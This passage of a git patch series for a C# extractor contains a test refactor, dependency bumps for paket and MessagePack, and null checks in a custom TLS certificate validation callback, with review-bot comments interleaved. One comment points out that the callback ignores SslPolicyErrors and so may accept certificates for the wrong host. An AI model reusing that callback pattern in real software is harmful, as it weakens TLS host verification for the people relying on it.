FileAccess.Write, FileShare.None)) + WithSetUpAndTearDown((longPath, _) => { - s1.Write(buffer1, 0, 10); - } + using (var s1 = new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None)) + { + s1.Write(buffer1, 0, 10); + } - byte[] buffer2 = { 9, 8, 7, 6, 5, 4, 3, 2, 1, 0 }; + byte[] buffer2 = { 9, 8, 7, 6, 5, 4, 3, 2, 1, 0 }; - using (var s2 = new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None)) - { - s2.Write(buffer2, 0, 10); - } + using (var s2 = new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None)) + { + s2.Write(buffer2, 0, 10); + } - byte[] buffer3 = new byte[10]; + byte[] buffer3 = new byte[10]; - using (var s3 = new FileStream(longPath, FileMode.Open, FileAccess.Read, FileShare.None)) - { - Assert.Equal(10, s3.Read(buffer3, 0, 10)); - } + using (var s3 = new FileStream(longPath, FileMode.Open, FileAccess.Read, FileShare.None)) + { + Assert.Equal(10, s3.Read(buffer3, 0, 10)); + } - Assert.True(Enumerable.SequenceEqual(buffer2, buffer3)); + Assert.True(Enumerable.SequenceEqual(buffer2, buffer3)); + }); } [Fact] public void LongFileExists() { - Assert.False(File.Exists("no such file")); - Assert.False(File.Exists("\":")); - Assert.False(File.Exists(@"C:\")); // A directory + WithSetUpAndTearDown((longPath, _) => + { + Assert.False(File.Exists("no such file")); + Assert.False(File.Exists("\":")); + Assert.False(File.Exists(@"C:\")); // A directory - Assert.False(File.Exists(longPath)); - new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None).Close(); - Assert.True(File.Exists(longPath)); + Assert.False(File.Exists(longPath)); + new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None).Close(); + Assert.True(File.Exists(longPath)); + }); } } } From 37982f5854731e1882965b10f3b24d6e271b8a82 Mon Sep 17 00:00:00 2001 
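Review bot: `CreateLongStream` still calls `Directory.CreateDirectory(Path.GetDirectoryName(longPath)!);` although the same call was removed from `Move` and `Replace`, and the constructor now creates `longPathDir` for every test. Dropping it would leave directory setup in one place. In `Move`, `File.Delete(longPath);` is likewise left over, since `WithSetUpAndTearDown` has already deleted a path that is unique to the test.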
From: Michael Nebel Date: Mon, 9 Dec 2024 10:11:05 +0100 Subject: [PATCH 0964/1267] C#: Update paket dotnet tool. --- csharp/.config/dotnet-tools.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/csharp/.config/dotnet-tools.json b/csharp/.config/dotnet-tools.json index 16d0d2fef4f..f6b7213de59 100644 --- a/csharp/.config/dotnet-tools.json +++ b/csharp/.config/dotnet-tools.json @@ -3,10 +3,10 @@ "isRoot": true, "tools": { "paket": { - "version": "9.0.1", + "version": "9.0.2", "commands": [ "paket" ] } } -} \ No newline at end of file +} From 083533a6738c05434ccc697484b80993393996ba Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Dec 2024 10:11:27 +0100 Subject: [PATCH 0965/1267] C#: Update paket dependencies lock file. --- csharp/paket.lock | 10 +++++----- csharp/paket.main.bzl | 6 +++--- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/csharp/paket.lock b/csharp/paket.lock index 1d8e48895b3..795b9d0cfe1 100644 --- a/csharp/paket.lock +++ b/csharp/paket.lock @@ -12,12 +12,12 @@ NUGET MSBuild.StructuredLogger (>= 2.2.243) System.Buffers (>= 4.6) Humanizer.Core (2.14.1) - MessagePack (3.0.3) - MessagePack.Annotations (>= 3.0.3) - MessagePackAnalyzer (>= 3.0.3) + MessagePack (3.0.300) + MessagePack.Annotations (>= 3.0.300) + MessagePackAnalyzer (>= 3.0.300) Microsoft.NET.StringTools (>= 17.11.4) - MessagePack.Annotations (3.0.3) - MessagePackAnalyzer (3.0.3) + MessagePack.Annotations (3.0.300) + MessagePackAnalyzer (3.0.300) Microsoft.Bcl.AsyncInterfaces (9.0) Microsoft.Build (17.12.6) Microsoft.Build.Framework (>= 17.12.6) diff --git a/csharp/paket.main.bzl b/csharp/paket.main.bzl index 4887b7c333f..e87f635dee0 100644 --- a/csharp/paket.main.bzl +++ b/csharp/paket.main.bzl 
@@ -9,9 +9,9 @@ def main(): packages = [ {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.9.4", "sha512": "sha512-VJMBSOOcdPD6ihA5k1gnVkDbH9GCABmx1055fFikEImT2dFp4yZhN7zMd8PW14tIb3BXIieP557n8xE+J2Y8Dw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net48": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", 
"Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net7.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": 
["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Humanizer.Core", "id": "Humanizer.Core", "version": "2.14.1", "sha512": "sha512-yzqGU/HKNLZ9Uvr6kvSc3wYV/S5O/IvklIUW5WF7MuivGLY8wS5IZnLPkt7D1KW8Et2Enl0I3Lzg2vGWM24Xsw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack", "id": "MessagePack", "version": "3.0.3", "sha512": "sha512-rFOP00M8dZRRVVjg11M79hU9lhMziIkmqIc9CQ9QhK0R+us1mmpuEGwvnFupqN4F3zYEEoAM36SAdVC+i+mw+Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", 
"System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net6.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net7.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net8.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", 
"Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netcoreapp3.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "3.0.3", "sha512": "sha512-LYOfElsnLTHsEs7VRd07mBiQjJos15mst8jP0v0zRx+t1OgUMUbbmQx6yO2fOww7vCyaX7vwXsoNuVJSdJdHPA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], 
"net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePackAnalyzer", "id": "MessagePackAnalyzer", "version": "3.0.3", "sha512": "sha512-gsMDGQbQv5dwGGKo2N6mC4TvIVaqKHqowgtqOMcVDLPnYUFdCViW2A+sssnBXJLR4m+zbFVHI7EBSR86svG+AQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack", "id": "MessagePack", "version": "3.0.300", "sha512": "sha512-5Mdl6CrQcxVVLawvqebPLALFdIMgWOnEGxxFvXWjJ/8KGyyhbfKMusj34Wv1AwE+uE9VAb+McVxtR9HDZIUwuA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePackAnalyzer", "MessagePack.Annotations", 
"Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net6.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net7.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net8.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], 
"netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netcoreapp3.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "3.0.300", "sha512": "sha512-Jh9+7EsDtDSEciX8RfXHWxtRlC94wvCmmv+sFzGdzPF4fAp7OAGFktzViPBHMkCxrSh3hmM7jGUB7yMyUmzRCA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], 
"net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePackAnalyzer", "id": "MessagePackAnalyzer", "version": "3.0.300", "sha512": "sha512-Ad0UHGpotoXZYkBjJgO5Z1aTJz5YIsFGVrxc75OiHO/fNKSRKFiM1X2E1WTB5h7pk3uDzqXfh0M5fEEQVZ8FiQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Bcl.AsyncInterfaces", "id": "Microsoft.Bcl.AsyncInterfaces", "version": "9.0.0", "sha512": "sha512-bYp2ksSR5uB6xqOa4NyD2gBOeFrc2n8FAWoh781MNMDcPjk1ysD7DNpv7r7sQOXfdFJT6F/syX7fN4lmUsn+RQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], 
"net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Build", "id": "Microsoft.Build", "version": "17.12.6", "sha512": "sha512-YEiL5xKowbwnr52YroALNHg8YurjLyFTlhv3USrswhubuxN2ldY1TmQpBKQ4K28UgWJV9BxTVXY9/CecMNDeOA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], 
"net6.0": [], "net7.0": [], "net8.0": [], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Build.Framework", "id": "Microsoft.Build.Framework", "version": "17.12.6", "sha512": "sha512-UjfxnrQN9BPVtO0Kvv2FB5dpN2CX5snc7coq5vVQdbCV6kdSpI/r+GZTLvU/5BTT8y8bvIUqoocxRR674N6bWg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": 
["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, From 547af6c3c957d053c2b6f8cdc6d2ff8f8b2f249f Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Dec 2024 10:11:49 +0100 Subject: [PATCH 0966/1267] C#: Introduce null checks in the NugetPackageRestorer. --- .../NugetPackageRestorer.cs | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index d0c0af6b768..9a366d86f62 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs @@ -604,6 +604,10 @@ namespace Semmle.Extraction.CSharp.DependencyFetching { httpClientHandler.ServerCertificateCustomValidationCallback = (message, cert, chain, _) => { + if (chain is null || cert is null) + { + return false; + } chain.ChainPolicy.TrustMode = X509ChainTrustMode.CustomRootTrust; chain.ChainPolicy.CustomTrustStore.Add(this.dependabotProxy.Certificate); return chain.Build(cert); From 86c6df5cbd389db790db9a49bbe747f8bbbcdbc8 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Tue, 10 Dec 2024 10:35:48 +0100 Subject: [PATCH 0967/1267] C#: Log warning when chain or certificate is not provided in the validation. --- .../NugetPackageRestorer.cs | 1 + 1 file changed, 1 insertion(+) 
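Review bot: The validation callback still discards its fourth argument (`_`, the `SslPolicyErrors` value), so once the new null guard passes, the result depends only on `chain.Build(cert)`. Building the chain does not compare the certificate name with the requested host, so as far as this hunk shows a certificate that chains to the proxy root but was issued for a different host name would be accepted. I would name the parameter (say `errors`) and reject that case before touching the chain policy, e.g. `if (errors.HasFlag(SslPolicyErrors.RemoteCertificateNameMismatch)) return false;`. If the proxy is known to present certificates that never match the feed host, a comment saying so belongs here instead. The enclosing method starts and ends outside the hunk.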
